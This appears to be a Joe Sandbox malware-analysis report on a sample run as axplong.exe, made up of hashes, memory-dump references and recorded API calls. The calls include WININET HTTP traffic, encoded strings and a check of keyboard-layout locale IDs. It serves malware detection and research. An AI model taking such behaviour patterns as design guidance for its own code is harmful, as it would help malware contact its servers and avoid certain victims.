Instruction ID: 27a8635dfe1e4dcf144c054b405232bd7f2fa14c577506c878efe0355716c54e
Opcode Fuzzy Hash: 715b519a6b0e75a26fd31336129d16f6e0f4a24f0590c0bda6cf0e875df5487e
Instruction Fuzzy Hash: 011159EB53C211FFA141C1662BAC6F56BABFEDB3307304127F047D6A52D2C90A5A5232

Function 052A03E6 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1408178852.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1032bfe9dc76c9ff7a886f028f8080b9567f4086497ca6f1c96f5d2bd21c0a73
Instruction ID: 23b97cfebf303a50144649d3488aa4d8f84ac0900b2923e21f1aa7a3ed18b914
Opcode Fuzzy Hash: 1032bfe9dc76c9ff7a886f028f8080b9567f4086497ca6f1c96f5d2bd21c0a73
Instruction Fuzzy Hash: F611B2DB07C220FF6141D1A6676C6F66B9FFADB3307708527B407D5A42E2C80B991132

Function 052A0465 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1408178852.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aad33695a35d5e448821a0336a737000a3afba6d4bb379eaa93c46cffb7ac051
Instruction ID: 611a6ca480cb646a97373d680a60cb3765f7d2e67bdb498baf314188f5936ae1
Opcode Fuzzy Hash: aad33695a35d5e448821a0336a737000a3afba6d4bb379eaa93c46cffb7ac051
Instruction Fuzzy Hash: AD1125DB07C111FFA141D56667686F66BAFFEDB3307718017B047D1A02E2C84A8A5132

Function 052A047E Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1408178852.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c859ae63b4a99843a6ee16d52785e6546b6ffd581f245029846e563b8d6fe6fc
Instruction ID: 6a62d9bb5c1bff3c8739f41c85fe9cd7511d72d7592b242bc75ce4c11d3d6fcf
Opcode Fuzzy Hash: c859ae63b4a99843a6ee16d52785e6546b6ffd581f245029846e563b8d6fe6fc
Instruction Fuzzy Hash: 0B110AA707C211BFA242C4A2276C5F6779BFED7731730841BF547C5A42E2C90B5A5132

Function 052A0445 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1408178852.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b24719d3ef85a33da8a08d9ab44335ee0ad09b95f39b544c7bf8003c4810bacb
Instruction ID: b98f7dc3ceddfba40aad6651526f6c93f6f5ba46cdc7d39b342886e154497922
Opcode Fuzzy Hash: b24719d3ef85a33da8a08d9ab44335ee0ad09b95f39b544c7bf8003c4810bacb
Instruction Fuzzy Hash: 7311E59B17C111FFA141D0A62768AF66B9FFED77317704417F047C5E42E2C8065A1132

Function 052A0434 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1408178852.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ddf5d0fd463171e7a2e8fd7ae844503bea50d8d3afa53856c78bf5dcea69668
Instruction ID: 768d2fb0ea9164d7ce39607b1efd6bc9675fab803681ca26ef30ab3abec01079
Opcode Fuzzy Hash: 3ddf5d0fd463171e7a2e8fd7ae844503bea50d8d3afa53856c78bf5dcea69668
Instruction Fuzzy Hash: E601D6DB03C211FF6041D1662768AF66B9FFDD77307718417B447D5A01E2C84A591132

Function 052A0498 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1408178852.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10214873765da92c3fe0deb985aa29930ba788c43a6d2f61a9fe819fc2e51a87
Instruction ID: 4299a9736de95f1a911ba189ab97d89d15821fa5b20908fde16aceadd2295003
Opcode Fuzzy Hash: 10214873765da92c3fe0deb985aa29930ba788c43a6d2f61a9fe819fc2e51a87
Instruction Fuzzy Hash: 4A01B5AB17D211FFA241D4922B28AF66BAFF9D7730731842BF447C1E02E1880A5D5172

Function 052A04E2 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1408178852.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16176a3ae1f37766d8d6ee66c647b5ab201ac5615586da251028629fc28e7a5a
Instruction ID: ac7ee5dda8fdcb1046e63bcbfc0fed412ef49c4886a8ba456cf3bb888a1da54f
Opcode Fuzzy Hash: 16176a3ae1f37766d8d6ee66c647b5ab201ac5615586da251028629fc28e7a5a
Instruction Fuzzy Hash: B2F0628B568110BE6151D0562728AF75B9FF9D7730B714417B447D1E42E1C90B9D1472

Function 052A04D4 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1408178852.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4afd18353b0c9557f366a7756761df44447868c8cda29127c441c3d77db8842
Instruction ID: df3c51b11608d4e850b96f1a8a19d9bfe6506124bffe11af056a9b3fff0c056c
Opcode Fuzzy Hash: b4afd18353b0c9557f366a7756761df44447868c8cda29127c441c3d77db8842
Instruction Fuzzy Hash: 48F096DB068114FE6041D4962B68AF66B9FF9D73717318417F443C1A02E2C90B9D2172

Function 052A04EA Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1408178852.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52a0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79f4b81c8ee55b5f5e800c3d446bbe29bc617c8207ab20a624fddcecc10e5a5d
Instruction ID: 470c6bdb97668bda7b55712ea2ee1687c01aa205aaad5d0ee002f6bb6395221f
Opcode Fuzzy Hash: 79f4b81c8ee55b5f5e800c3d446bbe29bc617c8207ab20a624fddcecc10e5a5d
Instruction Fuzzy Hash: 10F096CB568110FDB041D4462728AF69B9FF9D7330B308417B443C1E43E2C90B9D1172

Analysis Process: axplong.exePID: 6560, Parent PID: 1124COMMON

Execution Graph

Execution Coverage:	12.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.5%
Total number of Nodes:	1824
Total number of Limit Nodes:	101

Executed Functions

Function 0021BD60 Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00268D70,00000000,00000000,00000000,00000000), ref: 0021BDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0021BE10
HttpOpenRequestA.WININET(?,00000000), ref: 0021BE5B
HttpSendRequestA.WININET(?,00000000), ref: 0021BF1A
InternetReadFile.WININET(?,?,000003FF,?), ref: 0021BFCD
InternetReadFile.WININET(?,?,000003FF,?,?,?,?,?), ref: 0021C080
InternetCloseHandle.WININET(?), ref: 0021C0A7
InternetCloseHandle.WININET(?), ref: 0021C0AF
InternetCloseHandle.WININET(?), ref: 0021C0B7

Strings

8KG0fCKZFzY=, xrefs: 0021C385
8KG0fymoFx==, xrefs: 0021C2EB, 0021C543
RHYTYv==, xrefs: 0021BE33
invalid stoi argument, xrefs: 0021E404
stoi argument out of range, xrefs: 0021E3FA
d4', xrefs: 0021E2FF
RpKt, xrefs: 0021D516

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4'$invalid stoi argument$stoi argument out of range
API String ID: 1354133546-1263195991
Opcode ID: 6834684be633ed3548c3f72e364853689d6c15ab22f79066ad4b275bdfbb2212
Instruction ID: aa303e7576465b510b75f2a873138276ced1067417a4b39be4946b5d478283f8
Opcode Fuzzy Hash: 6834684be633ed3548c3f72e364853689d6c15ab22f79066ad4b275bdfbb2212
Instruction Fuzzy Hash: 74B1F6B0620118ABEB24DF28CC84BDDBBB9EF55304F6041A9F908972C1D7719AD4CF95

Function 0022D312 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0021247E

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 700af9d8147bb8755e754fb724535a3b679ff09d42feb17758ac317c1e618b75
Instruction ID: 61627698453d82fa4e2e53c19c99fed896aaab5902aacea0b136174ac1b627ce
Opcode Fuzzy Hash: 700af9d8147bb8755e754fb724535a3b679ff09d42feb17758ac317c1e618b75
Instruction Fuzzy Hash: B851C372920626DFEB15CF94F8857AEB7F0FB18310F24856AD408EB290D7749990CF90

Function 00223550 Relevance: 53.3, APIs: 1, Strings: 29, Instructions: 761
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0022425F

Part of subcall function 00227870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0022795C
Part of subcall function 00227870: __Cnd_destroy_in_situ.LIBCPMT ref: 00227968
Part of subcall function 00227870: __Mtx_destroy_in_situ.LIBCPMT ref: 00227971

Strings

fed3aa, xrefs: 0021FA9E, 00225489
W07l, xrefs: 00223AEE
aZT6, xrefs: 002253CC
JB6, xrefs: 002253F5
Fz==, xrefs: 0022369E, 00224D2D
9526, xrefs: 0022531D
V5Qk, xrefs: 00223DC0
8ZF6, xrefs: 00225502
MJB+, xrefs: 0021E734, 00224776, 002247ED, 00224A95, 00224B0C
mP=, xrefs: 00226383
V0N6, xrefs: 0022537A
5F6, xrefs: 00225497
96B6, xrefs: 00225470
Vp 6, xrefs: 00225447
HBhr, xrefs: 0022378F
5120, xrefs: 00223ABF, 00223BAA
WJP6, xrefs: 002253A3
invalid stoi argument, xrefs: 00222DE9, 00222DF8, 0022425A, 00224E9D
V0x6, xrefs: 0022541E
9KN6, xrefs: 00225351
", xrefs: 00223E99
aqB6, xrefs: 002254DB
MJF+, xrefs: 002247BD, 002248EC, 00224ADC, 00224C0B
-', xrefs: 00224F3A
WJms, xrefs: 00223BD9
6F9fr==, xrefs: 00224712
246122658369, xrefs: 0021F647, 0021F924, 002204F7, 002208AA, 00221EA5, 002227EE, 00222A43, 00222AB0, 00222E88, 00223373, 002233D4, 00224F4D, 00224F8F, 00224F99, 002254F4
stoi argument out of range, xrefs: 00222E02, 00224269, 00224EAC
KFT0PL==, xrefs: 002254B9

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$"$246122658369$5120$8ZF6$9526$96B6$9KN6$Fz==$HBhr$KFT0PL==$MJB+$MJF+$V0N6$V0x6$V5Qk$Vp 6$W07l$WJP6$WJms$aZT6$aqB6$fed3aa$invalid stoi argument$stoi argument out of range$-'
API String ID: 4234742559-197863327
Opcode ID: 5e780c3a3aba963756f80aaa7e7efbfa0d92b03145ca5ef48f2183d41cc0d929
Instruction ID: d867ede40a2cf8c717eeb12d81b1f820af3414e7239b3610e5aecfb193ecb938
Opcode Fuzzy Hash: 5e780c3a3aba963756f80aaa7e7efbfa0d92b03145ca5ef48f2183d41cc0d929
Instruction Fuzzy Hash: 5D524870A24258EBDF18EFB8DC4A7DDBB75AF45300F504288E405A7282D7749BA4CF92

Function 00215DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000419, xrefs: 00215FA8
Keyboard Layout\Preload, xrefs: 00215F64
0000043f, xrefs: 0021603B
00000422, xrefs: 00215FD9
00000423, xrefs: 0021600A

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 57ea83b8881ea73791ccaf6691d7ff56eced76d1169198493243976cf019eb82
Instruction ID: 2416deb36d23ac98cc589eb0ac7abebbda75feb11698e56aab16064e33b7d5d9
Opcode Fuzzy Hash: 57ea83b8881ea73791ccaf6691d7ff56eced76d1169198493243976cf019eb82
Instruction Fuzzy Hash: FEE1AE71910228BBEB24DFA4CC88BDDB7B9AF14304F5042D9E408A7291D774ABD4CF91

Function 00217D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 00217EA3

Strings

JmpyPb==, xrefs: 0021810A
JmpxQb==, xrefs: 002181B2
JmpxRL==, xrefs: 00218062

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 1721193555-2057465332
Opcode ID: c5f4cffc2b465a52c55463455409b1b43d2de01afaa389b789de65203b792c67
Instruction ID: 05c896bb4b75d1f1ba36fc132d94ba427d8181082db192050b8df941ca30458e
Opcode Fuzzy Hash: c5f4cffc2b465a52c55463455409b1b43d2de01afaa389b789de65203b792c67
Instruction Fuzzy Hash: F6D13870E24614EBDB14BB68DC4A3DD77B1AB92314F5442C8E809673C2DB754EE48BD2

Function 00246E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00246E23
GetFileInformationByHandle.KERNEL32(?,?), ref: 00246E7D
__dosmaperr.LIBCMT ref: 00246F12

Part of subcall function 00247177: __dosmaperr.LIBCMT ref: 002471AC

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: c456f5de900a99d81b8bd0faef79e294fd8e3d4db8ed8e57f36adbc237e8b3fc
Instruction ID: 0fcb76d6fec2e8bf2ebef6ffe08ede5c60620681baba232dd8001053e34f89df
Opcode Fuzzy Hash: c456f5de900a99d81b8bd0faef79e294fd8e3d4db8ed8e57f36adbc237e8b3fc
Instruction Fuzzy Hash: 33416075920605ABDB28DFB5EC459AFBBF9EF89300B11442DF596D3611E730A818CF21

Function 00246C99 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f041198622b2fa39791fe410e45d9e5ec9b0272f9a614d5ab4eabea8b7abe264
Instruction ID: a890c267a3ccde07668d9c0b091061746b7fbf615c763e55085d89c0c7eb9731
Opcode Fuzzy Hash: f041198622b2fa39791fe410e45d9e5ec9b0272f9a614d5ab4eabea8b7abe264
Instruction Fuzzy Hash: F521F831A21609BAEB197F649C46BAF3769DF43738F100310F9343B1D1D7B05E259AA2

Function 0027FA0C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000), ref: 0027FA2D

Strings

)z, xrefs: 0027FA12

Memory Dump Source

Source File: 00000009.00000001.1964387878.000000000027B000.00000040.00000001.01000000.00000007.sdmp, Offset: 0027B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_27b000_axplong.jbxd

Similarity

API ID: AllocVirtual
String ID: )z
API String ID: 4275171209-3567107451
Opcode ID: 3c0e45a5d2a3cff0331f1fee160483471c4fd237ce2a03db34b7bf5a14ba489e
Instruction ID: 09dec85e7761c116d5bd52dc93ea5026c8359caeaa5669d04c387065dbc05d51
Opcode Fuzzy Hash: 3c0e45a5d2a3cff0331f1fee160483471c4fd237ce2a03db34b7bf5a14ba489e
Instruction Fuzzy Hash: BAE08CB241C7449FEB022F3881822BEBBA0EF10301F2104AEC580426C2E2721C568B46

Function 002182B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 00218454

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813319105.0000000000272000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3813601680.0000000000279000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.000000000027B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.00000000004E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000519000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000523000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3814564219.0000000000531000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3822411389.0000000000532000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826555608.00000000006D5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.3826663852.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_210000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 5da8f75a2ba9ab9388b8a8ec255cf8188edaa637abefa1eb11bce04f03dfadbe
Instruction ID: c1112f721fc68099d9cdc72e507eb4018797cea2bb451392a58bf86f843fe5e2
Opcode Fuzzy Hash: 5da8f75a2ba9ab9388b8a8ec255cf8188edaa637abefa1eb11bce04f03dfadbe
Instruction Fuzzy Hash: AD514C70D242189BEB24EF64DD857EDB7B5DB55304F504298E804A72C1EF705AE0CBA1

Function 00246F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00246FB3

Memory Dump Source

Source File: 00000009.00000002.3813319105.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Offset: 00210000, based on PE: true

Associated: 00000009.00000002.3813192530.0000000000210000.00000004.00000001.01000000.00000007.sdmpDownload File
